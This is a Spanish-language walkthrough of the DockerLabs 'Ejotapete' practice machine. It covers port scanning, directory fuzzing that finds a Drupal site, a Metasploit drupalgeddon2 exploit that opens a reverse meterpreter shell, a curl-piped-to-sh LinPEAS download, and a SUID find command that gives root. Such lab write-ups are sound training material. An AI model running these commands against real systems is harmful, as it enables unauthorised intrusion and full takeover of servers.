Ejotapete DockerLabs (Very Easy)

Instalación

Cuando obtenemos el .zip nos lo pasamos al entorno en el que vamos a empezar a hackear la maquina y haremos lo siguiente.

unzip ejotapete.zip

Nos lo descomprimira y despues montamos la maquina de la siguiente forma.

bash auto_deploy.sh ejotapete.tar

Info:

                            ##        .         
                      ## ## ##       ==         
                   ## ## ## ##      ===         
               /""""""""""""""""\___/ ===       
          ~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ /  ===- ~~~
               \______ o          __/           
                 \    \        __/            
                  \____\______/               
                                          
  ___  ____ ____ _  _ ____ ____ _    ____ ___  ____ 
  |  \ |  | |    |_/  |___ |__/ |    |__| |__] [__  
  |__/ |__| |___ | \_ |___ |  \ |___ |  | |__] ___] 
                                         
                                     

Estamos desplegando la máquina vulnerable, espere un momento.

Máquina desplegada, su dirección IP es --> 172.17.0.2

Presiona Ctrl+C cuando termines con la máquina para eliminarla

Por lo que cuando terminemos de hackearla, le damos a Ctrl+C y nos eliminara la maquina para que no se queden archivos basura.

Escaneo de puertos

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP>
nmap -sCV -p<PORTS> <IP>

Info:

Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-14 11:39 EDT
Nmap scan report for packer.pw (172.17.0.2)
Host is up (0.000058s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.25 (Debian)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: Host: 172.17.0.2

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.68 seconds

Veremos un puerto 80 en el que aloja una pagina web, si entramos dentro veremos un 403 Forbidden por lo que vamos a realizar un poco de fuzzing a ver que encontramos.

Gobuster

gobuster dir -u http://<IP>/ -w <WORDLIST> -x html,php,txt -t 50 -k -r

Info:

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.17.0.2/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,php,txt
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 290]
/drupal               (Status: 200) [Size: 8892]
/.html                (Status: 403) [Size: 290]
/server-status        (Status: 403) [Size: 298]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================

Veremos que hay un /drupal por lo que vamos a entrar a ver si es el CMS real.

Si entramos veremos que efectivamente hay un drupal, este tipo de CMS tienen bastantes vulnerabilidades conocidas, por lo que vamos a ir a metasploit para desde ahi intentar explotar alguna vulnerabilidad si la tuviera, ya que no nos menciona la version vamos a probar a ciegas con algunos exploits conocidos.

Escalate user www-data

Metasploit (drupalgeddon2)

msfconsole -q

Una vez dentro vamos a buscar drupal.

search drupal

Elegiremos el numero 1 que es el modulo unix/webapp/drupal_drupalgeddon2 ya que es con el que me ha funcionado.

use unix/webapp/drupal_drupalgeddon2

Una vez que lo hayamos seleccionado, vamos a configurarlo de esta forma:

set RHOSTS <IP_VICTIM>
set TARGETURI /drupal
set LPORT 9999
exploit

Seleccionamos el TARGETURI ya que el drupal no va en la raiz del puerto 80 por lo que tendremos que poner desde donde se esta suministrando.

Info:

[*] Started reverse TCP handler on 192.168.177.129:9999 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending stage (40004 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (192.168.177.129:9999 -> 172.17.0.2:48976) at 2025-07-14 11:58:51 -0400

meterpreter > getuid
Server username: www-data

Veremos que ha funcionado y seremos dicho usuario.

Escalate Privileges

Si lanzamos un LinPEAS podremos ver lo siguiente:

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

Info:

Vemos que tenemos find con permisos SUID por lo que podremos hacer lo siguiente:

find . -exec /bin/bash -p \; -quit

Info:

bash-4.4# whoami
whoami
root

Con esto ya seremos root, por lo que habremos terminado la maquina.

Last updated